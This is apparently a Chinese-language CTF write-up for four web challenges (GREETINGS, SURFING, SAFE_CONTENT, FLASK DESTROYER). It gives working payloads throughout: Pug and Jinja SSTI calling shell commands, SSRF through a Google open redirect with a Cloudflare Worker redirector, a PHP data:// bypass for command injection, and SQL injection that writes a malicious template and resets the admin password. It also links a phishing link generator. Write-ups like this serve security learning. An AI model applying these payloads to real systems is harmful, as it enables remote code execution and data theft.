目录

GREETINGS

SURFING 

SAFE_CONTENT

FLASK DESTROYER

---

GREETINGS

打express的SSTI

GitHub - TheWation/NodeJsSSTI: Express app with Pug templates demonstrating SSTI vulnerability and secure implementation for educational purposes.

payload:

/result?username=%23{global.process.mainModule.require('child_process').execSync('cat+f*')}

SURFING 

提示打SSRF，但限制死了前缀要是http://google.com/

多了一个/，便不能用@绕过

打google的open redirect

GitHub - krystianbajno/opnredirect.py: 🪝 Google open-redirect vulnerability phishing link generator.

 用Cloudflare Worker来起一个临时域名

Cloudflare Workers©

/*** @typedef {Object} Env*/export default {/*** @param {Request} request* @param {Env} env* @param {ExecutionContext} ctx* @returns {Promise<Response>}*/async fetch(request, env, ctx) {const url = new URL(request.url);console.log(`Hello ${navigator.userAgent} at path ${url.pathname}!`);// Check if the path matches (you can customize the path condition if needed)if (url.pathname === "/") {// Redirect to the specified URL with a 302 status codereturn Response.redirect("http://127.0.0.1:8000/admin.php?username=admin&password=admin", 302);}},
};

 

生成payload:

 

成功302打ssrf 

 

SAFE_CONTENT

打命令注入，对内容的控制用data伪协议，isAllowedIP插一个localhost即可绕

<?php
var_dump(parse_url('data://localhost/plain;base64,111'));$exp = base64_encode(base64_encode("`cat /f* > /var/www/html/1.txt`"));echo "data://localhost/plain;base64," . $exp;

FLASK DESTROYER

可以实现sql写文件，文件只能新建，不能覆盖

username=admin"%3bselect+'success!'+into+outfile+'/destroyer/app/static/test.html'%3b--%2b&password=123&vibe=y

 

 

想着写恶意模板进app/templates目录打SSTI

但未经注册，无法渲染

 这时候再审计代码，可以发现当/login路由查表成功，会调strtok去分割数据，再写入User返回

但是因为strtok代码本身存在错误，当传入的string末尾为:时，会传入none进token，继而让internal server error，从而重启服务，这样就可以将事先写入app/templates下的模板文件注册

 先写入恶意文件

username=admin";select "{{config.__class__.__init__.__globals__['os'].popen('cat /tmp/*/*/*/*').read()}}" into outfile '/destroyer/app/templates/test.html';--+&password=123&vibe=y

再修改admin密码为123:

username=admin";update user set password = '123:' where username = 'admin';--+&password=123&vibe=y

修改后，再以admin/123:登录，此时服务会报错，刷新即可重启服务

最后以admin" or 1=1# /1登录

访问./exp.html拿到flag